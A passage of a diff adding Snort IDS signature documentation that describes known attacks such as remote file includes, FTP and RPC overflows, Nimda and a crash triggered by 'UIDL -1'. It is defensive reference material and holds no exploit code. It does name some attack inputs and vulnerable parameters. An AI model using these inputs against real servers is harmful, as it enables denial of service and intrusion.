+corporate information to destinations external to the corporation. In
+some instances this event may indicate behavior contrary to best
+security practices.
+
+--
+Detailed Information:
+This event may indicate a violation of corporate policy. It may also
+indicate the use of services or applications that may be the antithesis
+of best security practices.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+Violation of corporate security policy can manifest serious risk to
+company assets.
+
+--
+Ease of Attack:
+Not applicable
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure adherence to best security practices and strict adherence to
+corporate policy
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1724.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1724
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1089.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1089
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1283.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1283
+
+--
+Summary:
+This event is generated when an attempt is made to cause a denial of service of WWW Publishing Service and IIS Administration software.
+
+--
+Impact:
+Denial of service.  This attack may cause a vulnerable server to stop.
+
+--
+Detailed Information:
+Outlook Web Access (OWA) is an optional feature of Microsoft Exchange Server that allows a user to access mail through a web interface supported by Internet Information Services (IIS).  A denial of service of the support software WWW Publishing service and IIS Administration can occur when a user enters a long string of '%' characters in the Log On field in OWA and enters these characcters in the username and password field received in the NT challenge dialog.
+
+--
+Affected Systems:
+Microsoft Exchange Server 5.5 and Microsoft Exchange Server 5.5 SP1, SP2, SP3, SP4
+
+--
+Attack Scenarios:
+An attacker can enter a long string of '%' characters in OWA Log On and challenge fields to cause a denial of service against a vulnerable server.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the most current version of Microsoft Exchange Server.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/3223
+
+--
--- /dev/null
+++ b/doc/signatures/349.txt
@@ -0,0 +1,63 @@
+SID:
+349
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible execution of commands on the affected server as with elevated user privileges
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) has a problem with very 
+log directory names. There is insufficent checking on directories 
+created by users allowing possible insertion of data into the stack.This
+can lead to execution of code with root / elevated user privileges.
+--
+
+Affected Systems:
+NcFTP Software NcFTPD 2.3.5
+Washington University wu-ftpd 2.4.2 (beta 18) VR10 
+RedHat wu-ftpd 2.4.2 b18-2 
+Washington University wu-ftpd 2.4.2 academ[BETA-18] 
+Probably others as well, susspect anything under Washington University wu-ftpd 2.6.0 for this particular exploit.
+--
+
+Attack Scenarios:
+A local attacker will attempt to create long named directories on the 
+ftp server wich are not checked correctly in the server code. This can 
+allow commands to be executed with elevated user privileges
+--
+
+Ease of Attack:
+simple
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to newest version of wuftpd, or replace with something more secure.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/571.txt
@@ -0,0 +1,66 @@
+SID:
+571
+--
+
+Rule:
+--
+
+Summary:
+This event indicates an attempt to exploit the tool talk RPC database 
+service
+--
+
+Impact:
+Possible unauthorized administrative access to the server or application
+or a denial of service to the affected application running on a Solaris 
+system
+--
+
+Detailed Information:
+ToolTalk RPC database service (rpc.ttdbserverd) does not perform 
+adequate input validation or provide a format string specifier argument 
+when writing to syslog. This means a specifically crafted RPC request to
+the ToolTalk RPC database service overwriting specific locations in 
+memory and therefore allowing execution of code with the same permission
+level as the user running ttdbserverd, usually root.
+--
+
+Affected Systems:
+	Solaris 1.1 - 2.6
+Possibly other vendors, if you are running Tool Talk (rpc.ttdbserverd) check with your vendor.
+--
+
+Attack Scenarios:
+An attacker will send a specially crafted RPC call to the 
+rpc.ttdbserverd daemon running on an affected system. A sucessful 
+attack will then run code on the server with the access level of the 
+root user.
+--
+
+Ease of Attack:
+Simple, Exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Updates packages and patches are available from vendors, install them or
+disable the service if not needed.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000381.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000381
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_ug_auth.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_ug_auth.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1294.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid:
+1294
+
+--
+Summary: 
+This event is generated when traffic indicating Nimda worm activity is
+detected.
+
+--
+Impact:
+Possible infection by the Nimda virus.
+
+--
+Detailed Information:
+Nimda spreads by file infection, mass emailer, file share, or IIS unicode exploit 
+to attack unpatched systems.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows 2000
+
+--
+Attack Scenarios:
+An unpatched server is connected to the internet and is infected or
+an infected email is opened. Once infected the worm spreads itself.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Check the suspect host for signs of infection. Apply patches 
+or upgrade the operating system
+
+--
+Contributors:
+Snort documentation contributed by Timothy Vienneau
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/topics/virus/nimda.asp
+
+F-Secure:
+http://www.f-secure.com/v-descs/nimda.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/569.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+569
+
+--
+Summary:
+The snmpXdmi daemon is used on Sun Solaris systems to map Simple Network
+Management Protocol (SNMP) management requests to and from the Desktop 
+Management Interface (DMI).
+
+This daemon contains a boundary condition error that could result in a 
+buffer overflow that will present the attacker with super user access to
+the target host.
+
+--
+Impact:
+Complete control of the target machine.
+
+--
+Detailed Information:
+The snmpXdmi daemon is installed and enabled by default on the affected 
+systems below.
+
+DMI is used to manage components on client machines across a network. It
+can be used in conjunction with SNMP via a daemon such as snmpXdmi.
+
+A number of exploits for this vulnerability exist and are in use. The result of a sucessful attack is a complete root compromise of the victim host.
+
+Compromised systems are reported to display a number of commonalities such as:
+
+	A core file for snmpXdmi on /
+	Two instances of inetd running
+	Telnet and SSH backdoors running on high ports
+	An instance of an IRC proxy
+	System binaries replaced by rootkit versions
+	Network sniffers installed
+	Log files changed
+
+The system binaries 'ps' and 'netstat' cannot be trusted to show all 
+running processes since they may have been replaced by rootkit versions 
+specially modified so as to hide evidence of the compromise.
+
+--
+Affected Systems:
+Sun Solaris 2.6, 7.0, 8.0 for SPARC and Intel architectures
+
+--
+Attack Scenarios:
+The attacker must send specially crafted packets to the snmpXdmi daemon 
+or use one of the widely available exploits.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the snmpXdmi service.
+
+Apply the appropriate patches for each affected system.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2417
+
+CERT:
+http://www.cert.org/advisories/CA-2001-05.html
+http://www.kb.cert.org/vuls/id/648304
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0236
+
+--
--- /dev/null
+++ b/doc/signatures/549.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+549
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000785.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000785
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "ATutor" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "forgot" parameter in the "password_reminder.php" script used by the "ATutor" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using ATutor
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1375.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1375
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2370.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2370
+
+--
+Summary:
+This event is generated when an attempt is made to access config.conf, a 
+component of the BugPort PHP web application running on a server.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+BugPort is a PHP application used for bug tracking purposes. It is
+possible for a remote user to view the configuration file for the
+application by making a request for the file using a web browser.
+
+--
+Affected Systems:
+	BugPort prior to version 1.099
+
+--
+Attack Scenarios:
+An attacker can view the configuration file for the server by using a
+web browser to request the file.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1339.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1339
+
+--
+Summary:
+Attempted chsh command access via web
+
+--
+Impact:
+Attempt to change a users shell on a webserver.
+
+--
+Detailed Information:
+This is an attempt to change a users shell on a machine. Using this
+command an attackermay change the shell of a user to suit his own
+needs. By changingthe shell an attacker may further compromise a
+machine by specifyinga shell that could contain a Trojan Horse
+component or that couldcontain embedded commands specially crafted by
+anattacker.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/chsh'
+in the URIwhich can then change the shell of a user present on the
+host.This commandmay also be requested on a command line should the
+attacker gainaccess to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside ofit's designated web root or cgi-bin.Whenever possible,
+sensitive filesand certain areas of the filesystem should have the
+system immutableflag set to negate the use of the chsh command. On BSD
+derived systems,setting the systems runtime securelevel also prevents
+the securelevelfrom being changed. (note: the securelevel can only be 
+increased)
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+man chsh
+
+--
--- /dev/null
+++ b/doc/signatures/1214.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1214
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000486.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000486
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PhpBlueDragon CMS" application running on a 
+webserver. Access to the file "template.php" using a remote file being passed 
+as the "vsDragonRootPath" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "vsDragonRootPath" parameter in the "template.php" 
+script used by the "PhpBlueDragon CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PhpBlueDragon CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2932.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2932
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/1004.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1004
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000413.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000413
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "REDAXO" application running on a webserver. Access to the file "index.inc.php" using a remote file being passed as the "REX[INCLUDE_PATH]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "REX[INCLUDE_PATH]" parameter in the "index.inc.php" script used by the "REDAXO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using REDAXO
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2122.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2122
+
+--
+Summary:
+This event is generated when a remote user uses a negative argument in the UIDL command sent to port 110 on an internal server.  This may indicate an attempt to exploit a boundary checking vulnerability in the POP UIDL command in the Alt-N MDaemon mail server.
+
+--
+Impact:
+The service will crash when it attempts to process the command. The attacker must have a valid POP account on the mail server to attempt this exploit.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a boundary checking vulnerability in the UIDL command on the Alt-N MDaemon POP server. If an authenticated user sends the UIDL command with a negative argument to the POP server, the MDaemon service will crash when it attempts to process the command. Note that this exploit can only be attempted by an authenticated user with a valid IMAP account on the server.
+
+--
+Affected Systems:
+Any operating system that runs the following IMAP servers:
+  -Alt-N MDaemon 6.0.0
+  -Alt-N MDaemon 6.0.5
+  -Alt-N MDaemon 6.0.6
+  -Alt-N MDaemon 6.0.7
+
+
+--
+Attack Scenarios:
+An authenticated user can send a UIDL -1 command to the POP server, which will cause the service to crash.
+
+--
+Ease of Attack:
+Simple. Exploits and proof of concept exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Alt-N MDaemon 6.5.0 or later.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7445
+http://www.securityfocus.com/bid/6053
+
+--
--- /dev/null
+++ b/doc/signatures/2766.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2766
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_columns_from_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1173.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1173
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
